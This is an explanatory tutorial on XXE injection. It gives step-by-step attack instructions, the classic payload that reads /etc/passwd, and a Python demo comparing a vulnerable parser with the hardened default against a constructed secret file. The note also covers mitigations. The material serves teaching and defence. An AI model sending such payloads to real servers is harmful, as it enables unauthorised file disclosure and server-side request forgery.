What is XXE?
XML External Entity injection (XXE) is a web security vulnerability in
applications that parse XML with a parser configured to resolve external
entities. An attacker who controls the XML input can declare an entity whose
value is fetched from a file path or URL of their choosing, so the parser
reads that resource on the server's behalf. Depending on how the application
handles the parsed data, this leads to disclosure of local files, server-side
request forgery against internal systems, and denial of service.
XML Entity:
An XML entity is a named placeholder, declared in the document type
definition (DTD), that the parser replaces with its value wherever it is
referenced as &name;. Internal entities carry their value inline (the
predefined ones such as &lt; and &amp; are the familiar case). External
entities are declared with the SYSTEM keyword and an identifier such as a
file path or URL, and the parser fetches their value from that location.
That fetching step is what XXE abuses.
An XML External Entity (XXE) attack exploits the ability of XML processors to
resolve external entities, leading to disclosure of sensitive information
and, in uncommon parser configurations, even remote code execution. Here is
a step-by-step explanation of how XXE attacks are performed:
1. Understanding the Target:
• Identify an endpoint that accepts XML from the client, such as a web
form, a SOAP or XML-RPC API, or a file upload in an XML-based format.
2. Crafting Malicious XML Payload:
• Write an XML document whose DOCTYPE declares an external entity
(SYSTEM followed by a file path or URL) and reference that entity from an
element whose value the application will echo back or store.
3. Injection of Malicious XML Payload:
• Inject the crafted XML payload into the request body, input field, or
parameter that the target application parses as XML.
4. Triggering XML Processing:
• Submit the request so that the server-side parser processes the payload.
If the parser is configured to resolve external entities, nothing more is
needed from the attacker.
5. Exploiting External Entity Declaration:
• The parser reads the entity declaration, fetches the resource named by
the SYSTEM identifier (a local file, an internal URL, or another data
source), and substitutes its contents for the entity reference. If the
application includes that element in its response, the contents are
returned directly to the attacker; if not, the attack is blind and has to
be confirmed through side channels such as error messages or out-of-band
requests.
Example XXE Payload: Consider the following XML payload that attempts to
read the contents of the /etc/passwd file:

    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >
    ]>
    <foo>&xxe;</foo>

In this example, xxe is an external entity whose SYSTEM identifier points to
/etc/passwd. A parser that resolves external entities replaces &xxe; with
the file's contents, and if the application returns the value of <foo> in
its response, the file is disclosed. /etc/passwd is the usual first target
because it is world-readable and contains no characters (such as < or &)
that would make the substituted content ill-formed XML.
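The five steps above, run end to end, as an added example that is not code from the original page or from the referenced write-ups. It uses only the Python standard library: xml.sax on top of expat, with the feature_external_ges switch selecting the vulnerable configuration (external entities resolved) or the hardened default (Python 3.7.1 and later skip them). The secret file, its contents and the temporary directory are constructed for the demo and stand in for /etc/passwd; the payload is the page's payload with the file path swapped for a file:// URL to that file. contains_doctype is a hypothetical pre-parse check of the kind many frameworks apply, not an API of xml.sax.

```python
"""Added example (not from the original page): the same XXE payload fed to a
parser that resolves external entities and to the hardened default.

Assumptions, all constructed for this demo: the secret file is written to a
temporary directory instead of /etc/passwd, and the payload targets it by
file:// URL.  Python 3.7.1 or newer disables external general entities in
xml.sax by default, so the vulnerable path has to opt in explicitly.
"""
import io
import pathlib
import tempfile
import xml.sax
import xml.sax.handler


def build_payload(target_url: str) -> bytes:
    """Step 2: the page's payload with the file path swapped for target_url."""
    return (
        "<!DOCTYPE foo [ <!ELEMENT foo ANY >\n"
        f'  <!ENTITY xxe SYSTEM "{target_url}" > ]>\n'
        "<foo>&xxe;</foo>"
    ).encode()


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data, i.e. whatever the parser put inside <foo>."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks: list[str] = []

    def characters(self, content: str) -> None:
        self.chunks.append(content)


def extract_text(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Steps 4 and 5: parse xml_bytes and return the document's text.

    With resolve_external_entities=True the parser fetches whatever the
    SYSTEM identifier points at (file://, http://, ...) and splices it in:
    the XXE bug.  With False (the xml.sax default since Python 3.7.1) the
    entity reference is skipped and nothing is fetched.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks).strip()


def contains_doctype(xml_bytes: bytes) -> bool:
    """Hypothetical pre-parse check: entity declarations can only live in a
    DTD, so rejecting any document with a DOCTYPE stops the payload before
    the parser sees it.  Encoding tricks (e.g. UTF-16 input) can slip past a
    byte-level check, so treat this as defence in depth; the real fix is the
    parser setting used in extract_text."""
    return b"<!DOCTYPE" in xml_bytes


def demo() -> dict:
    """Run the payload against the vulnerable and the hardened configuration."""
    workdir = pathlib.Path(tempfile.mkdtemp())
    secret = workdir / "config.txt"
    # Constructed stand-in for /etc/passwd: plain text with no '<' or '&'.
    secret.write_text("db_password=hunter2\n")

    payload = build_payload(secret.as_uri())
    return {
        "doctype_detected": contains_doctype(payload),
        "vulnerable": extract_text(payload, resolve_external_entities=True),
        "hardened": extract_text(payload, resolve_external_entities=False),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

With external entities enabled the text of <foo> is the secret file's contents; with the default setting it is empty and no file is opened. The same on/off switch exists in most parsers (for example resolve_entities in lxml or disallow-doctype-decl in Java's SAX and DOM factories), and turning it off is the fix; the DOCTYPE check is only a cheap extra layer.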